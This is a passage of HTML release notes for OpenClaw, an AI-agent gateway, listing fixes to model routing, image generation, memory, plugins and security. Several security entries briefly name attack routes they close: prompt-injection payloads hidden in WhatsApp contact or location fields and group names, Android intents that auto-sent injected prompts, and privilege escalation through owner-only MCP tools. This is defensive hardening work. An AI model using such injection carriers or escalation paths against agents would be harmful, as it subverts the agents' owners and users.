<li>Memory/CLI: declare the built-in <code>local</code> embedding provider in the memory-core manifest, so standalone <code>openclaw memory status</code>, <code>index</code>, and <code>search</code> can resolve local embeddings just like the gateway runtime. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319498725" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70836" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70836/hovercard" href="https://github.com/openclaw/openclaw/issues/70836">#70836</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319903672" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70873" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70873/hovercard" href="https://github.com/openclaw/openclaw/pull/70873">#70873</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mattznojassist/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mattznojassist">@mattznojassist</a>.</li>
<li>Gateway/WebChat: preserve image attachments for text-only primary models by offloading them as media refs instead of dropping them, so configured image tools can still inspect the original file. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4287666211" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68513" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68513/hovercard" href="https://github.com/openclaw/openclaw/issues/68513">#68513</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4066225308" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44276" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44276/hovercard" href="https://github.com/openclaw/openclaw/issues/44276">#44276</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4112734613" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51656" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51656/hovercard" href="https://github.com/openclaw/openclaw/issues/51656">#51656</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4309685353" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70212" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70212/hovercard" href="https://github.com/openclaw/openclaw/issues/70212">#70212</a>.</li>
<li>Plugins/Google Meet: hang up delegated Twilio calls on leave, clean up Chrome realtime audio bridges when launch fails, and use a flat provider-safe tool schema.</li>
<li>Media understanding: honor explicit image-model configuration before native-vision skips, including <code>agents.defaults.imageModel</code>, <code>tools.media.image.models</code>, and provider image defaults such as MiniMax VL when the active chat model is text-only. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4079114113" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47614" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47614/hovercard" href="https://github.com/openclaw/openclaw/issues/47614">#47614</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4231959911" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63722" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63722/hovercard" href="https://github.com/openclaw/openclaw/issues/63722">#63722</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4292840857" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69171" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69171/hovercard" href="https://github.com/openclaw/openclaw/issues/69171">#69171</a>.</li>
<li>Codex/media understanding: support <code>codex/*</code> image models through bounded Codex app-server image turns, while keeping <code>openai-codex/*</code> on the OpenAI Codex OAuth route and validating app-server responses against generated protocol contracts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4309522289" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70201" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70201/hovercard" href="https://github.com/openclaw/openclaw/issues/70201">#70201</a>.</li>
<li>Providers/OpenAI Codex: synthesize the <code>openai-codex/gpt-5.5</code> OAuth model row when Codex catalog discovery omits it, so cron and subagent runs do not fail with <code>Unknown model</code> while the account is authenticated.</li>
<li>Models/Codex: preserve Codex provider metadata when adding models from chat or CLI commands, so manually added Codex models keep the right auth and routing behavior. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319321563" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70820" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70820/hovercard" href="https://github.com/openclaw/openclaw/pull/70820">#70820</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Takhoffman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Takhoffman">@Takhoffman</a>.</li>
<li>Providers/OpenAI: route <code>openai/gpt-image-2</code> through configured Codex OAuth directly when an <code>openai-codex</code> profile is active, instead of probing <code>OPENAI_API_KEY</code> first.</li>
<li>Providers/OpenAI: harden image generation auth routing and Codex OAuth response parsing so fallback only applies to public OpenAI API routes and bounded SSE results. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Takhoffman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Takhoffman">@Takhoffman</a>.</li>
<li>OpenAI/image generation: send reference-image edits as guarded multipart uploads instead of JSON data URLs, restoring complex multi-reference <code>gpt-image-2</code> edits. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4316931305" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70642" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70642/hovercard" href="https://github.com/openclaw/openclaw/issues/70642">#70642</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dashhuang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dashhuang">@dashhuang</a>.</li>
<li>Providers/OpenRouter: send image-understanding prompts as user text before image parts, restoring non-empty vision responses for OpenRouter multimodal models. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312662772" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70410" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70410/hovercard" href="https://github.com/openclaw/openclaw/issues/70410">#70410</a>.</li>
<li>Providers/Google: honor the private-network SSRF opt-in for Gemini image generation requests, so trusted proxy setups that resolve Google API hosts to private addresses can use <code>image_generate</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4269431435" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67216" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67216/hovercard" href="https://github.com/openclaw/openclaw/issues/67216">#67216</a>.</li>
<li>Agents/transport: stop embedded runs from lowering the process-wide undici stream timeouts, so slow Gemini image generation and other long-running provider requests no longer inherit short run-attempt headers timeouts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312763316" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70423" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70423/hovercard" href="https://github.com/openclaw/openclaw/issues/70423">#70423</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/giangthb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/giangthb">@giangthb</a>.</li>
<li>Providers/OpenAI: honor the private-network SSRF opt-in for OpenAI-compatible image generation endpoints, so trusted LocalAI/LAN <code>image_generate</code> routes work without disabling SSRF checks globally. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221864091" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62879" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62879/hovercard" href="https://github.com/openclaw/openclaw/issues/62879">#62879</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/seitzbg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/seitzbg">@seitzbg</a>.</li>
<li>Providers/OpenAI: stop advertising the removed <code>gpt-5.3-codex-spark</code> Codex model through fallback catalogs, and suppress stale rows with a GPT-5.5 recovery hint.</li>
<li>Control UI/chat: persist assistant-generated images as authenticated managed media and accept paired-device tokens for assistant media fetches, so webchat history reloads keep showing generated images. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317927968" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70719" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70719/hovercard" href="https://github.com/openclaw/openclaw/pull/70719">#70719</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318227484" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70741" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70741/hovercard" href="https://github.com/openclaw/openclaw/pull/70741">#70741</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Patrick-Erichsen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Patrick-Erichsen">@Patrick-Erichsen</a>.</li>
<li>Control UI/chat: queue Stop-button aborts across Gateway reconnects so a disconnected active run is canceled on reconnect instead of only clearing local UI state. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317304097" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70673" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70673/hovercard" href="https://github.com/openclaw/openclaw/pull/70673">#70673</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chinar-amrutkar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chinar-amrutkar">@chinar-amrutkar</a>.</li>
<li>Memory/QMD: recreate stale managed QMD collections when startup repair finds the collection name already exists, so root memory narrows back to <code>MEMORY.md</code> instead of staying on broad workspace markdown indexing.</li>
<li>Agents/OpenAI: surface selected-model capacity failures from PI, Codex, and auto-reply harness paths with a model-switch hint instead of the generic empty-response error. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/QR: replace legacy <code>qrcode-terminal</code> QR rendering with bounded <code>qrcode-tui</code> helpers for plugin login/setup flows. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4255382870" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65969" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65969/hovercard" href="https://github.com/openclaw/openclaw/pull/65969">#65969</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Voice-call/realtime: wait for OpenAI session configuration before greeting or forwarding buffered audio, and reject non-allowlisted Twilio callers before stream setup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4061033395" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43501" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/43501/hovercard" href="https://github.com/openclaw/openclaw/pull/43501">#43501</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/forrestblount/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/forrestblount">@forrestblount</a>.</li>
<li>ACPX/Codex: stop materializing <code>auth.json</code> bridge files for Codex ACP, Codex app-server, and Codex CLI runs; Codex-owned runtimes now use their normal <code>CODEX_HOME</code>/<code>~/.codex</code> auth path directly.</li>
<li>Auto-reply/system events: route async exec-event completion replies through the persisted session delivery context, so long-running command results return to the originating channel instead of being dropped when live origin metadata is missing. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4310392062" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70258" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70258/hovercard" href="https://github.com/openclaw/openclaw/pull/70258">#70258</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wzfukui/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wzfukui">@wzfukui</a>.</li>
<li>Gateway/sessions: extend the webchat session-mutation guard to <code>sessions.compact</code> and <code>sessions.compaction.restore</code>, so <code>WEBCHAT_UI</code> clients are rejected from compaction-side session mutations consistently with the existing patch/delete guards. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317846623" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70716" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70716/hovercard" href="https://github.com/openclaw/openclaw/pull/70716">#70716</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
<li>QA channel/security: reject non-HTTP(S) inbound attachment URLs before media fetch, and log rejected schemes so suspicious or misconfigured payloads are visible during debugging. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317761421" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70708" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70708/hovercard" href="https://github.com/openclaw/openclaw/pull/70708">#70708</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/install: link the host OpenClaw package into external plugins that declare <code>openclaw</code> as a peer dependency, so peer-only plugin SDK imports resolve after install without bundling a duplicate host package. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4313294513" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70462" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70462/hovercard" href="https://github.com/openclaw/openclaw/pull/70462">#70462</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anishesg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anishesg">@anishesg</a>.</li>
<li>Plugins/Windows: refresh the packaged plugin SDK alias in place during bundled runtime dependency repair, so gateway and CLI plugin startup no longer race on <code>ENOTEMPTY</code>/<code>EPERM</code> after same-guest npm updates.</li>
<li>Teams/security: require shared Bot Framework audience tokens to name the configured Teams app via verified <code>appid</code> or <code>azp</code>, blocking cross-bot token replay on the global audience. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317946331" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70724" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70724/hovercard" href="https://github.com/openclaw/openclaw/pull/70724">#70724</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/startup: resolve bundled plugin Jiti loads relative to the target plugin module instead of the central loader, so Bun global installs no longer hang while discovering bundled image providers. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4307757270" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70073" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70073/hovercard" href="https://github.com/openclaw/openclaw/pull/70073">#70073</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yidianyiko/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yidianyiko">@yidianyiko</a>.</li>
<li>Anthropic/CLI security: derive Claude CLI <code>bypassPermissions</code> from OpenClaw's existing YOLO exec policy, preserve explicit raw Claude <code>--permission-mode</code> overrides, and strip malformed permission-mode args instead of silently falling back to a bypass. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317943033" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70723" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70723/hovercard" href="https://github.com/openclaw/openclaw/pull/70723">#70723</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Android/security: require loopback-only cleartext gateway connections on Android manual and scanned routes, so private-LAN and link-local <code>ws://</code> endpoints now fail closed unless TLS is enabled. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317940763" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70722" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70722/hovercard" href="https://github.com/openclaw/openclaw/pull/70722">#70722</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Pairing/security: require private-IP or loopback hosts for cleartext mobile pairing, and stop treating <code>.local</code> or dotless hostnames as safe cleartext endpoints. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317933544" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70721" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70721/hovercard" href="https://github.com/openclaw/openclaw/pull/70721">#70721</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/security: stop setup-api lookup from falling back to the launch directory, so workspace-local <code>extensions/&lt;plugin&gt;/setup-api.*</code> files cannot be executed during provider setup resolution. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317905776" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70718" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70718/hovercard" href="https://github.com/openclaw/openclaw/pull/70718">#70718</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
<li>Approvals/security: require explicit chat exec-approval enablement instead of auto-enabling approval clients just because approvers resolve from config or owner allowlists. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317765259" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70715" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70715/hovercard" href="https://github.com/openclaw/openclaw/pull/70715">#70715</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Discord/security: keep native slash-command channel policy from bypassing configured owner or member restrictions, while preserving channel-policy fallback when no stricter access rule exists. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317763069" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70711" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70711/hovercard" href="https://github.com/openclaw/openclaw/pull/70711">#70711</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Android/security: stop <code>ASK_OPENCLAW</code> intents from auto-sending injected prompts, so external app actions only prefill the draft instead of dispatching it immediately. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317764736" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70714" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70714/hovercard" href="https://github.com/openclaw/openclaw/pull/70714">#70714</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Secrets/Windows: strip UTF-8 BOMs from file-backed secrets and keep unavailable ACL checks fail-closed unless trusted file or exec providers explicitly opt into <code>allowInsecurePath</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317129545" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70662" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70662/hovercard" href="https://github.com/openclaw/openclaw/pull/70662">#70662</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhanggpcsu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhanggpcsu">@zhanggpcsu</a>.</li>
<li>Agents/image generation: escape ignored override values in tool warnings so parsed <code>MEDIA:</code> directives cannot be injected through unsupported model options. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317762579" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70710" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70710/hovercard" href="https://github.com/openclaw/openclaw/pull/70710">#70710</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>QQBot/security: require framework auth for <code>/bot-approve</code> so unauthorized QQ senders cannot change exec approval settings through the unauthenticated pre-dispatch slash-command path. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317735442" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70706" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70706/hovercard" href="https://github.com/openclaw/openclaw/pull/70706">#70706</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>MCP/tools: stop the ACPX OpenClaw tools bridge from listing or invoking owner-only tools such as <code>cron</code>, closing a privilege-escalation path for non-owner MCP callers. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317612919" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70698" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70698/hovercard" href="https://github.com/openclaw/openclaw/pull/70698">#70698</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Feishu/onboarding: load Feishu setup surfaces through a setup-only barrel so first-run setup no longer imports Feishu's Lark SDK before bundled runtime deps are staged. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4311786128" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70339" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70339/hovercard" href="https://github.com/openclaw/openclaw/pull/70339">#70339</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andrejtr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andrejtr">@andrejtr</a>.</li>
<li>Approvals/startup: let native approval handlers report ready after gateway authentication while replaying pending approvals in the background, so slow or failing replay delivery no longer blocks handler startup or amplifies reconnect storms.</li>
<li>WhatsApp/security: keep contact/vCard/location structured-object free text out of the inline message body and render it through fenced untrusted metadata JSON, limiting hidden prompt-injection payloads in names, phone fields, and location labels/comments.</li>
<li>Group-chat/security: keep channel-sourced group names and participant labels out of inline group system prompts and render them through fenced untrusted metadata JSON.</li>
<li>Agents/replay: preserve Kimi-style <code>functions.&lt;name&gt;:&lt;index&gt;</code> tool-call IDs during strict replay sanitization so custom OpenAI-compatible Kimi routes keep multi-turn tool use intact. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317536165" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70693" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70693/hovercard" href="https://github.com/openclaw/openclaw/pull/70693">#70693</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/geri4/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/geri4">@geri4</a>.</li>
<li>Discord/replies: preserve final reply permission context through outbound delivery so Discord replies keep the same channel/member routing rules at send time.</li>
<li>Plugins/startup: restore bundled plugin <code>openclaw/plugin-sdk/*</code> resolution from packaged installs and external runtime-deps stage roots, so Telegram/Discord no longer crash-loop with <code>Cannot find package 'openclaw'</code> after missing dependency repair. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319745436" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70852" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70852/hovercard" href="https://github.com/openclaw/openclaw/pull/70852">#70852</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/simonemacario/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/simonemacario">@simonemacario</a>.</li>
<li>CLI/Claude: run the same prompt-build hooks and trigger/channel context on <code>claude-cli</code> turns as on direct embedded runs, keeping Claude Code sessions aligned with OpenClaw workspace identity, routing, and hook-driven prompt mutations. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4316475365" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70625" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70625/hovercard" href="https://github.com/openclaw/openclaw/pull/70625">#70625</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>.</li>
<li>Discord/plugin startup: keep subagent hooks lazy behind Discord's channel entry so packaged entry imports stay narrow and report import failures with the channel id and entry path.</li>
<li>Memory/doctor: keep root durable memory canonicalized on <code>MEMORY.md</code>, stop treating lowercase <code>memory.md</code> as a runtime fallback, and let <code>openclaw doctor --fix</code> merge true split-brain root files into <code>MEMORY.md</code> with a backup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4316390163" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70621" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70621/hovercard" href="https://github.com/openclaw/openclaw/pull/70621">#70621</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>.</li>
<li>Providers/Anthropic Vertex: restore ADC-backed model discovery after the lightweight provider-discovery path by resolving emitted discovery entries, exposing synthetic auth on bootstrap discovery, and honoring copied env snapshots when probing the default GCP ADC path. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251357682" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65715" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65715/hovercard" href="https://github.com/openclaw/openclaw/issues/65715">#65715</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251358554" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65716" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65716/hovercard" href="https://github.com/openclaw/openclaw/pull/65716">#65716</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/feiskyer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/feiskyer">@feiskyer</a>.</li>
<li>Codex harness/status: pin embedded harness selection per session, show active non-PI harness ids such as <code>codex</code> in <code>/status</code>, and keep legacy transcripts on PI until <code>/new</code> or <code>/reset</code> so config changes cannot hot-switch existing sessions.</li>
